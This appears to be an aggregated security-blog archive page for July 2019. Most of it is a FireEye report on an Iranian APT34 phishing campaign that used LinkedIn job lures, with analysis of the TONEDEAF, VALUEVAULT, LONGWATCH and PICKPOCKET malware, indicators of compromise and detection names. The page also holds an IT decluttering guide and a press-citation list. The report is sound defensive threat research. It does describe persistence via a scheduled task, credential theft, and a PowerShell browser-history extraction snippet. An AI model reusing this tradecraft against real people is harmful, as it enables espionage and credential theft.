Monthly Archives: July 2019
PayPal Reports Second Quarter 2019 Results
Hard Pass: Declining APT34’s Invite to Join Their Professional Network
Background
With increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and scope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this gap by conducting espionage against decision makers and key organizations that may have information that furthers Iran's economic and national security goals. The identification of new malware and the creation of additional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of Iranian interests.
FireEye Identifies Phishing Campaign
In late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor. Three key attributes caught our eye with this particular campaign:
- Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,
- The usage of LinkedIn to deliver malicious documents,
- The addition of three new malware families to APT34’s arsenal.
FireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its tracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE), Intelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of PICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will examine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying their hand at Golang.
APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. They use a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by various security researchers. This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial, energy, and government entities.
Additional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.
Mandiant Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight: Iran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection efforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include APT33, which is mentioned in this updated FireEye blog post.
Industries Targeted
The activities observed by Managed Defense, and described in this post, were primarily targeting the following industries:
- Energy and Utilities
- Government
- Oil and Gas
Utilizing Cambridge University to Establish Trust
On June 19, 2019, Mandiant Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and was stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral monitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies that threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be sandboxed or terminated, preventing an exploit from reaching its next programmed step.
The Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5: b338baa673ac007d7af54075ea69660b), located in C:\Users\<user_name>\.templates. The file System.doc is a Windows Portable Executable (PE), despite having a "doc" file extension. FireEye identified this new malware family as TONEDEAF.
A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details of TONEDEAF in the malware appendix of this post.
Retracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls originated from the URL http://www.cam-research-ac[.]com/Documents/ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.
Managed Defense reached out to the impacted customer’s security team, who confirmed the file was received via a LinkedIn message. The targeted employee conversed with "Rebecca Watts", allegedly employed as "Research Staff at University of Cambridge". The conversation with Ms. Watts, provided in Figure 1, began with the solicitation of resumes for potential job opportunities.
Figure 1: Screenshot of LinkedIn message
asking to download TONEDEAF
This is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various campaigns. These conversations often take place on social media platforms, which can be an effective delivery mechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.
FireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file hashes:
- 96feed478c347d4b95a8224de26a1b2c
- caf418cbf6a9c4e93e79d4714d5d3b87
A snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded text upon opening.
Figure 2: Screenshot of VBA code from System.doc
The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\<user_name>\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will rename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled task, clearly obfuscated to avoid simple detection.
Figure 3: Additional VBA code from System.doc
Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.
The FireEye Footprint: Pivots and Victim Identification
After identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and Advanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations. Of note, FireEye discovered two additional new malware families hosted at this domain, VALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft tool FireEye has been tracking since May 2018, hosted on the C2.
Requests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of installation and purpose. Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to track infected target activity. URLs were observed with the following structures:
- hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000
- hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000
- hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000
- hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000
The first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Window’s temp folder. Further information regarding LONGWATCH is detailed in the Malware Appendix section at the end of the post.
FireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure (Figure 4).
GET
hxxp://offlineearthquake.com/file/<sys_id>/b.exe?id=<3char_redacted>&n=000 User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) AppleWebKit/537.36 (KHTML, like Gecko) Host: offlineearthquake[.]com Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1 |
Figure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance
FireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.
VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.
VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. Further information regarding VALUEVAULT can be found in the appendix below.
Further pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5: d8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files were analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.
PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34.
Conclusion
The activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true techniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense customers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon the observed indicators to identify a broader campaign, as well as the use of new and old malware.
We suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping their TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we recommend organizations remain vigilant in their defenses, and remember to view their environment holistically when it comes to information security.
Learn more about Mandiant Managed Defense, and catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.
Malware Appendix
TONEDEAF
TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality. Figure 5 provides a snippet of the assembly CALL instruction of dns_exfil. The creator likely made this as a means for future DNS exfiltration as a plan B.
Figure 5: Snippet of code from TONEDEAF binary
Aside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and bugs that prevent it from executing properly. One such bug involves determining the length of a command response string without accounting for Unicode strings. As a result, a single command response byte is sent when, for example, the malware executes a shell command that returns Unicode output. Additionally, within the malware, an unused string contained the address 185[.]15[.]247[.]154.
VALUEVAULT
VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.
VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. A snippet of this function is shown in Figure 6.
powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory |
Figure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials
Upon execution, VALUEVAULT creates a SQLITE database file in the AppData\Roaming directory under the context of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the dumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault Password Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.
Figure 7: SQL format of the VALUEVAULT
fsociety.dat SQLite database
VALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other developer environment variables were directly available within the binary as shown below. VALUEVAULT does not possess the ability to perform network communication, meaning the operators would need to manually retrieve the captured output of the tool.
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/new_edge.go |
Figure 8: Golang files extracted during execution of VALUEVAULT
LONGWATCH
FireEye identified the binary WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a) hosted on the malicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.
Interesting strings identified in the binary are shown in Figure 9.
GetAsyncKeyState >---------------------------------------------------\n\n c:\\windows\\temp\\log.txt [ENTER] [CapsLock] [CRTL] [PAGE_UP] [PAGE_DOWN] [HOME] [LEFT] [RIGHT] [DOWN] [PRINT] [PRINT SCREEN] (1 space) [INSERT] [SLEEP] [PAUSE] \n---------------CLIPBOARD------------\n \n\n >>> (2 spaces) c:\\windows\\temp\\log.txt |
Figure 9: Strings identified in a LONGWATCH binary
Detecting the Techniques
FireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT, and LONGWATCH. Table 2 contains several specific detection names that provide an indication of APT34 activity.
Signature Name |
FE_APT_Keylogger_Win_LONGWATCH_1 |
FE_APT_Keylogger_Win_LONGWATCH_2 |
FE_APT_Keylogger_Win32_LONGWATCH_1 |
FE_APT_HackTool_Win_PICKPOCKET_1 |
FE_APT_Trojan_Win32_VALUEVAULT_1 |
FE_APT_Backdoor_Win32_TONEDEAF |
TONEDEAF BACKDOOR [DNS] |
TONEDEAF BACKDOOR [upload] |
TONEDEAF BACKDOOR [URI] |
Table 1: FireEye Platform Detections
Endpoint Indicators
Indicator | MD5 Hash (if applicable) | Code Family |
System.doc | b338baa673ac007d7af54075ea69660b | TONEDEAF |
| 50fb09d53c856dcd0782e1470eaeae35 | TONEDEAF |
ERFT-Details.xls | 96feed478c347d4b95a8224de26a1b2c | TONEDEAF DROPPER |
| caf418cbf6a9c4e93e79d4714d5d3b87 | TONEDEAF DROPPER |
b.exe | 9fff498b78d9498b33e08b892148135f | VALUEVAULT |
WindowsNTProgram.exe | 021a0f57fe09116a43c27e5133a57a0a | LONGWATCH |
PE86.dll | d8abe843db508048b4d4db748f92a103 | PICKPOCKET |
PE64.dll | 6eca9c2b7cf12c247032aae28419319e | PICKPOCKET |
Table 2: APT34 Endpoint Indicators from this blog post
Network Indicators
hxxp[://]www[.]cam-research-ac[.]com
offlineearthquake[.]com
c[.]cdn-edge-akamai[.]com
185[.]15[.]247[.]154
Acknowledgements
A huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this APT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth malware analysis.
Tips for the IT Department on Reducing Cyber Clutter
Just like kitchen drawers and closets, computers accumulate clutter over time. And when you have an entire organization’s worth of people to watch and exponential amounts of data collected every day, it takes more than a day of spring cleaning to get your environment clean. Clearing out your team’s cyber clutter will not only help make the business more organized and productive, but it will also mitigate the vulnerabilities that accompany the clutter.
Here are four areas you should de-clutter to ensure your organization’s digital presence is clean:
1. Physical Devices
Physical devices can take up most of your organizational environment, from user computers to firewalls. All of these devices have proprietary information of some form on them, so it’s wise to keep them at the forefront of your decluttering.
Here’s a few tips:
- Create and enforce policies and procedures for your organization’s documents.
- Implement a document deletion policy and make sure your team is aware of it. You don’t want a user’s computer to be stolen with years’ worth of documents stored on it.
- Consider how sensitive documents are handled. These are documents that should not be accessed by the general organization, should not be stored on a local machine, and may need to be encrypted.
- If you have a cloud storage solution, enforce automatic backup for users. This enables you to have a better view of what your users are storing and what they are doing with those documents.
2. Cloud Storage
Because cloud storage doesn’t take up space in your server room, it’s easy to forget to quality control it as you do your physical storage. And while cloud storage is generally hosted by trusted service providers, we’ve seen these servers open in the wild before.
When cloud storage applications are one of the easiest ways to exfiltrate company data, it’s important to regulary clean them out and restrict access as appropriate.
- Are you currently restricting what cloud storage systems your users are able to access? This is a twofold concern as having company accounts attached to multiple cloud systems opens up avenues for attackers and data exfiltration.
- Enforce your company document policies and procedures with your cloud storage. It’s actually easier to enforce some policies within the cloud, such as least privilege permissions.
- Utilize the built-in security features that many cloud storage apps have. These can protect against data exfiltration or alert for suspicious activity.
3. Email
Email accounts are some of the largest data hubs, storing information about an account’s owner and everyone they interact with. Think of the email accounts of the members of your HR department, full of employees’ sensitive data.
When addressing the security of your company’s email accounts, consider:
- Do you have a limit on how much data a single inbox can hold?
- If you don’t have a limit, do you have a widely known policy on the importance of cleaning out your email boxes every so often? This depends on your organization, but your users should be informed of the risks of keeping their friend’s vendor’s personal contact information in their inbox for six months.
- Sometimes it’s surprising what capabilities users are unaware of within their emails. It’s a great idea to empower your users to utilize your email service’s tools by providing them with guides for things like how to:
- Search for sensitive data to quickly find and delete it,
- Set up automatic deletion rules, and
- Set up rules that screen their inbox for marketing or important emails.
- If your organization has a data retention policy, make sure that emails are included in it. This will affect the permissions your users have; for example, you can completely remove users’ ability to delete emails within their individual inboxes.
4. Apps
Oftentimes we forget the pervasiveness of apps, whether they’re on our computer or mobile devices. Most companies are utilizing Mobile Device Management (MDM) for their devices.
However, an MDM still needs to be reviewed and have proper enforcements put in place. Consider:
- Are apps restricted only to the people that need them? For example, your marketing team may need access to Facebook and Instagram, but your engineers do not.
- If there are accounts or subscriptions associated with an app, be sure to document all of the relevant information. You don’t want to run into a situation where an employee leaves the organization, but they were the sole owner of applications important to the organizational workflow.
- All apps should be as securely configured as possible; however, sometimes apps make this difficult by hiding the settings in question. Review all apps and create procedures for secure configuration before they are allowed to the general population of your organization.
Other Things to Think about
- For organizations that utilize photography or videography, keep in mind that this type of data is just as vulnerable as a text document. Your organizational data policies apply here, perhaps even more stringently.
- Password keepers are a great method of ensuring that users adhere to proper password practice, such as using strong and unique passwords. Make sure the user is aware of how to properly use the password keeper, otherwise they may find ways to avoid using it.
- Implement a company-wide multi-factor authentication policy to prevent unauthorized access to your systems. It’s also important to judge your needs of security and your users’ acceptance to see if you should invest in hard tokens instead of the more common soft tokens like authentication apps.
By following the tips above to de-clutter your IT environment, you will ultimately help your organization become more secure.
The post Tips for the IT Department on Reducing Cyber Clutter appeared first on GRA Quantum.
Happy Birthday TaoSecurity.com
Reference: TaoSecurity Press
- As of 2017, Mr. Bejtlich generally declines press inquiries on cybersecurity matters, including those on background.
- 2016
- Mr. Bejtlich was cited in the Forture story Meet the US's First Ever Cyber Chief, published 8 September 2016.
- Mr. Bejtlich was interviewed for the NPR story Cybersecurity: Who's Vulnerable To Attack?, aired 30 July 2016.
- Mr. Bejtlich was interviewed for the Washington Post story It’s not just the DNC; we all send emails we probably shouldn’t, published 25 July 2016.
- Mr. Bejtlich was interviewed for the New Scientist story NATO says the internet is now a war zone – what does that mean?, published 22 June 2016.
- Mr. Bejtlich was interviewed for the Military Times story The Pentagon's controversial plan to hire military leaders off the street, published 19 June 2016.
- Mr. Bejtlich was interviewed for the Idealog story Idealog talks with a cyber-war expert, published 6 May 2016.
- Mr. Bejtlich was cited in the New Zealand Herald story Cyber-attacks part of doing business with China - experts, published 5 May 2016.
- Mr. Bejtlich was cited in the Christian Science Monitor story Iran hacking indictment highlights US naming and shaming strategy, published 30 March 2016.
- Mr. Bejtlich was cited in the Financial Times story Defence groups take aim at cyber security, published 28 March 2016.
- Mr. Bejtlich was interviewed for the Security Management story A Chinese New Year, published 4 January 2016.
- 2015
- Mr. Bejtlich was cited in the AP story US Advised to Examine "Hack Back" Options against China, published 17 November 2015.
- Mr. Bejtlich was cited in the Reuters story Data from US agency cyber breach not on black market - researcher, published 2 November 2015.
- Mr. Bejtlich was cited in the NextGov story Creative, Audacious or Destructive: The Different Personalities of Nation-State Hackers, published 2 November 2015.
- Mr. Bejtlich was cited in the Baltimore Sun story As more devices go online, hackers hunt for vulnerabilities, published 24 October 2015.
- Mr. Bejtlich was cited in the Atlantic story Can Campus Networks Ever Be Secure?, published 12 October 2015.
- Mr. Bejtlich was cited in the Info Security story China Cuffs Hackers at Request of US Officials, published 12 October 2015.
- Mr. Bejtlich was interviewed for the Risky Business podcast, aired 2 October 2015.
- Mr. Bejtlich was cited in the NextGov story Who’s Really in Charge of Federal Cybersecurity and Is It Time for a White House CISO?, published 30 September 2015.
- Mr. Bejtlich was cited in the FCW story Time for U.S. to gut 'malware kingpins', published 29 September 2015.
- Mr. Bejtlich was cited in the South China Morning Post story Xi and Obama agree on cybercrime cooperation meetings as threat of sanctions of alleged theft of trade secrets looms, published 27 September 2015.
- Mr. Bejtlich was cited in the MIT Technology Review story Waiting for a Drop in Corporate Hacks after U.S.-China Deal, published 25 September 2015.
- Mr. Bejtlich was cited in the Foreign Policy story Will China Deliver on Its Promise to Stop Hacking American Businesses?, published 25 September 2015.
- Mr. Bejtlich was cited in the InfoWorld story U.S., China reach 'common understanding' on cyber attacks, published 25 September 2015.
- Mr. Bejtlich was cited in the Buzzfeed story The U.S. And China Are Discussing A Cyber Arms Pact, But Everyone Is Still Getting Hacked, published 23 September 2015.
- Mr. Bejtlich was cited in the CNBC story China's Xi to visit US tech—amid tepid expectations, published 23 September 2015.
- Mr. Bejtlich was cited in the USA Today story China: On cybersecurity, U.S. must not rock the boat, published 23 September 2015.
- Mr. Bejtlich was cited in the Gigaom story Considering the security implications of CloudFlare’s partnership with Baidu, published 21 September 2015.
- Mr. Bejtlich was cited in the South China Morning Post story Companies must be willing to go to war against hackers to protect sensitive data, or stop collecting it: experts, published 17 Seotember 2015.
- Mr. Bejtlich was cited in the TechRepublic story The new art of war: How trolls, hackers and spies are rewriting the rules of conflict, published 14 September 2015.
- Mr. Bejtlich was cited in the GBTimes story Cyber security: A thorn in US-China relations, published 4 September 2015.
- Mr. Bejtlich was cited in the CNBC story http://www.cnbc.com/2015/09/02/the-new-global-cyberwar-without-boundaries-or-winners.html, published 2 September 2015.
- Mr. Bejtlich was cited in the South China Morning Post story The US may have to go after the 'Great Firewall' to stop China's cyber-attacks, published 30 August 2015.
- Mr. Bejtlich was interviewed for the Dark Reading broadcast Richard Bejtlich Talks Business Security Strategy, US Security Policy, published 26 August 2015.
- Mr. Bejtlich was cited in the CBS News story Does Ashley Madison represent a new era in hacking?, published 19 August 2015.
- Mr. Bejtlich was cited in the New Economy story Firms’ lack of knowledge puts them dangerously at risk of cyber attacks, published 17 August 2015.
- Mr. Bejtlich was cited in the Washington Post story Just how secure are private e-mail servers? Hint: not very, published 13 August 2015.
- Mr. Bejtlich was cited in the USNI story Sen. Gardner: Administration Unwilling to ‘Name Names’ in Cyber Security Breaches, published 23 July 2015.
- Mr. Bejtlich was cited in the NextGov story OPM Chief’s New Cyber Defense Operation Has Potential, Private Investigators Say, published 28 June 2015.
- Mr. Bejtlich was cited in the DefenseNews story OPM Attack Raises Delicate Political Questions, published 27 June 2015.
- Mr. Bejtlich was interviewed on CNBC Asia (video), aired live 25 June 2015.
- Mr. Bejtlich was interviewed for the Risky Business podcast, aired 25 June 2015.
- Mr. Bejtlich was cited in the Federal Times story OPM breach a failure on encryption, detection, published 22 June 2015.
- Mr. Bejtlich was cited in the Dark Reading story OPM Breach Exposes Agency's Systemic Security Woes, published 10 June 2015.
- Mr. Bejtlich was interviewed on the Kojo Nnamdi Show segment The Implications of a New Federal Government Data Breach, aired live 8 June 2015.
- Mr. Bejtlich was cited in the Washington Post story Is e-mail the safest way to notify federal workers their data may have been hacked?, published 8 June 2015.
- Mr. Bejtlich appeared on a panel on the TV program Defense News, in two segments, aired 7 June 2015.
- Mr. Bejtlich was cited in the Washington Post story Why OPM should have seen the latest cyberattack coming, published 5 June 2015.
- Mr. Bejtlich was cited in the Daily Beast story New Snowden Docs Show How the NSA and FBI Became BFFs, published 4 June 2015.
- Mr. Bejtlich was cited in the Newsweek story Vladimir Putin’s Budding Bromance With China’s Xi Jinping, published 16 May 2015.
- Mr. Bejtlich was cited in the Dark Reading story What Does China-Russia 'No Hack' Pact Mean For US?, published 11 May 2015.
- Mr. Bejtlich was cited in the Tech Republic story Latest President Obama-requested cyberthreat intelligence agency may be overkill, published 1 May 2015.
- Mr. Bejtlich was cited in the Financial Times story Pentagon makes pitch to young tech-savvy individuals, published 23 April 2015.
- Mr. Bejtlich was cited in the Wall Street Journal story Five Simple Steps to Protect Corporate Data, published 19 April 2015.
- Mr. Bejtlich was cited in the China Digital Times story http://chinadigitaltimes.net/2015/04/chinese-great-cannon-identified-behind-greatfire-attacks/, published 10 April 2015.
- Mr. Bejtlich was cited in the Military Times story Does cyber corps merit its own service branch?, published 9 April 2015.
- Mr. Bejtlich was cited in the Fortune story Gasp! China admits to having cyber warriors, published 26 March 2015.
- Mr. Bejtlich was cited in The Hill story House Intel panel closing in on cyber bill, published 19 March 2015.
- Mr. Bejtlich was cited in The Hill story DOJ: 'We have no interest in prosecuting' cyber researchers, published 19 March 2015.
- Mr. Bejtlich was cited in the Washington Post story Federal government struggles to manage communication devices, published 17 March 2015.
- Mr. Bejtlich was cited in the Baltimore Sun story Defense secretary: We could create separate military force to fight cyber wars, published 13 March 2015.
- Mr. Bejtlich was cited in the Bloomberg story A BlackBerry Here, iPhone There: Clinton Reveals E-Mail Anarchy, published 12 March 2015.
- Mr. Bejtlich was cited in the Bloomberg story Most Big Firms Have Had Some Hacking: Business of Law, published 11 March 2015.
- Mr. Bejtlich was cited in the Dark Reading story Efforts To Team Up And Fight Off Hackers Intensify, published 5 March 2015.
- Mr. Bejtlich's testimony to the House Energy and Commerce committee was covered in the FierceGovernmentIT story CISOs must first define the risk, cybersecurity analyst tells Congress, published 5 March 2015, the Hill story Expert: Healthcare lacks 'top-tier' cyber defenses, published 3 March 2015, and the Pittsburgh Tribune-Review story Cyber security expert to report to Congress, published 3 March 2015..
- Mr. Bejtlich's panel at the Washington Business Journal cyber security conference was covered in the stories Want to be acquired? Get your cybersecurity in order and Does your company need cyber insurance?, published on 27 February and 2 March 2015, respectively.
- Mr. Bejtlich was interviewed for the SiriusXM POTUS channel, discussing CTIIC (audio download), aired on 27 February 2015.
- Mr. Bejtlich's panel at the Wall Street Journal CIO conference was covered in the stories Sony Attack Took Company ‘Back to the ‘80s’, Data Breaches Spark Debates on CISO, CIO Dynamic, and How the Sony Breach Changes Cybersecurity, published in early February 2015.
- Mr. Bejtlich was mentioned in the Intercept article Western Spy Agencies Secretly Rely on Hackers for Intel and Expertise, published 4 February 2015.
- Mr. Bejtlich's 28 January 2015 testimony to the Senate Homeland Security and Government Affairs Committee on Protecting America from Cyber Attacks: The Importance of Information Sharing was covered by USA Today, FierceGovernmentIT, The Daily Cardinal, SecurityWeek, and FedScoop.
- Mr. Bejtlich was interviewed for the Daily Beast story Was Sony Hit With a Second Hack?, published 8 January 2015.
- Mr. Bejtlich was cited in the Dark Reading story Using Free Tools To Detect Attacks On ICS/SCADA Networks, published 8 January 2015.
- Mr. Bejtlich was cited in the Wired story Critics Say New Evidence Linking North Korea to the Sony Hack Is Still Flimsy, published 8 January 2015.
- 2014
- Mr. Bejtlich was interviewed for the Dark Reading story Sony Hacked By N. Korea, Hacktivists, Ex-Employee, Or All Of The Above?, published 30 December 2014.
- Mr. Bejtlich was cited in the Huffington Post story As North Korea Loses Internet, Anonymous, Others Question Whether It Really Hacked Sony, published 22 December 2014.
- Mr. Bejtlich was interviewed for the CBS News story Hacking After Sony: What Companies Need to Know, published 13 December 2014.
- Mr. Bejtlich was interviewed for the SearchSecurity story Security Strategy with Richard Bejtlich, published 6 December 2014.
- Mr. Bejtlich was interviewed for the Fox Business segment US Businesses Behind on Cyber Security (video), aired 2 December 2014.
- Mr. Bejtlich was cited in the Dark Reading story FBI Warning Shows Targeted Attacks Don't Just Steal Anymore, published 2 December 2014.
- Mr. Bejtlich was cited in an excerpt from Shane Harris' book, @War, as Google’s secret NSA alliance, published 16 November 2014.
- Mr. Bejtlich was interviewed for the Fedscoop story What does the White House network breach mean for cybersecurity reform?, published 3 November 2014.
- Mr. Bejtlich was mentioned by FCW as one of 4 cybersecurity gurus to follow on Twitter, published 1 October 2014.
- Mr. Bejtlich was introduced by Sqrrl as a company advisor in Sqrrl Bolsters Cybersecurity Capabilities with New Advisors, published 22 September 2014.
- Mr. Bejtlich was interviewed for the McClatchy news bureau story Chinese hacking into critical Pentagon contractors, published 17 September 2014.
- Mr. Bejtlich was interviewed for the Ars Technica story In case of cyber attack: NATO members ready to pledge mutual defense, published 4 September 2014.
- Mr. Bejtlich was interviewed for the CSO story The hacker 'skills gap' may be more of a strategy gap, published 3 September 2014.
- Mr. Bejtlich was interviewed for the ZDNet story Cybersecurity hiring crisis: Rockstars, anger and the billion dollar problem, published 26 August 2014.
- Mr. Bejtlich was cited in the NextGov story Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers, published 18 August 2014.
- Mr. Bejtlich was interviewed for the Washington Post story Chinese cyberspies have hacked Middle East experts at major U.S. think tanks, published 7 July 2014.
- Mr. Bejtlich was cited in the Foreign Policy story Supreme Court Shields Cell Phone Data, published 25 June 2014.
- Mr. Bejtlich was interviewed for the Voice of America story US Cyberfirm: China Military Continues Hacking After US Indictment, published 10 June 2014.
- Mr. Bejtlich was interviewed for the CSO story Needed: Breach Detection, published 27 May 2014.
- Mr. Bejtlich was interviewed for the ABC This Week story Cyber Spying Alert, aired 25 May 2014.
- Mr. Bejtlich was interviewed for the Dark Reading story State-Owned Chinese Firms Hired Military Hackers for IT Services, published 21 May 2014.
- Mr. Bejtlich was interviewed for the Washington Business Journal story Will China retaliate over cyber-espionage charges?, published 21 May 2014.
- Mr. Bejtlich was interviewed for the NPR story Charges Of Chinese Cybercrimes To Play Out In American Courts, aired 19 May 2014.
- Mr. Bejtlich was interviewed for the Recode story What to Expect From Charges Against Chinese Hackers: Nothing, published 19 May 2014.
- Mr. Bejtlich was interviewed for the USA Today story China's theft of business secrets is beyond espionage, published 19 May 2014.
- Mr. Bejtlich was cited in the AP story US charges Chinese officials in cyberspying case, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Dark Reading story The New Normal: US Charges Chinese Military Officers With Cyber Espionage, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Christian Science Monitor story US indicts five in China's secret 'Unit 61398' for cyber-spying on US firms, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Hill story Holder hits China on cyber spying, published 19 May 2014.
- Mr. Bejtlich was interviewed on the Kojo Nnamdi Show segment The U.S. Criminal Hacking Case Against China, aired live 19 May 2014.
- Mr. Bejtlich was interviewed for the Daily Beast story #ShotsFired in U.S.-China Cyberwar, published 19 May 2014.
- Mr. Bejtlich was interviewed for the PCWorld story Chinese state-owned enterprises 'hired' military hacking unit, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Foreign Policy story Caught Red-Handed, published 19 May 2014.
- Mr. Bejtlich was cited in the Register story Call of Duty 'fragged using OpenSSL's Heartbleed exploit', published 10 April 2014.
- Mr. Bejtlich was interviewed in the NPR story For China And U.S., An Attempt To Clarify Rules Of Cyberwarfare, aired 7 April 2014.
- Mr. Bejtlich was cited in the PBS story Opening Doors to Iran, U.S. Allows Academic Exchanges, aired 7 April 2014.
- Mr. Bejtlich was cited in the Bloomberg story SEC Probes Threat From Cyber Attacks Against Wall Street, published 25 March 2014.
- Mr. Bejtlich was cited in the Wall Street Journal story Cyberdefense Costs Mount, published 26 February 2014.
- Mr. Bejtlich was cited in the Christian Science Monitor story New US cybersecurity standards: Will they do enough? published 12 February 2014.
- Mr. Bejtlich was interviewed for the WGBH story Security Experts: Colleges Targeted For Future Cyber Attacks, published 12 February 2014.
- Mr. Bejtlich was cited in the Politico story Cybersecurity in slow lane one year after Obama order, published 9 February 2014.
- Mr. Bejtlich was interviewed for the NPR story A Possible Explanation For How U.S. Diplomat's Call Was Tapped, published 8 February 2014.
